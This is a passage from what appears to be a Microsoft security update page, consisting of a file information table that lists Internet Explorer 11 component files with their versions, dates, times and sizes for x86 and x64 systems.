\nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 230,912 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:46| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:34| 333,312 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 20:55| 489,472 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 22:45| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:52| 38,912 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:36| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:31| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 4,096 \nF12.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Resources.dll| 11.0.9600.18939| 10-Feb-2018| 9:17| 10,948,096 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:17| 1,207,808 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:40| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nieetwcollector.exe| 11.0.9600.18666| 16-Apr-2017| 0:47| 104,960 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 2:19| 4,096 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20045| 4-Jun-2021| 21:12| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 19:58| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 19:58| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 19:58| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 19:58| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:36| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Aug-2021| 21:05| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.20045| 4-Jun-2021| 21:48| 1,399,296 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:18| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:19| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:16| 2,308,608 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:11| 692,224 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:23| 154,112 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 124,928 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:11| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:48| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:40| 24,486 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:38| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:25| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:39| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \n \n### \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:30| 2,882,048 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 21:22| 108,544 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 19:18| 65,024 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:28| 1,562,624 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 23:30| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 21:51| 43,008 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:35| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:01| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:20| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:00| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:58| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:02| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 31,232 \nwininet.dll.mui| 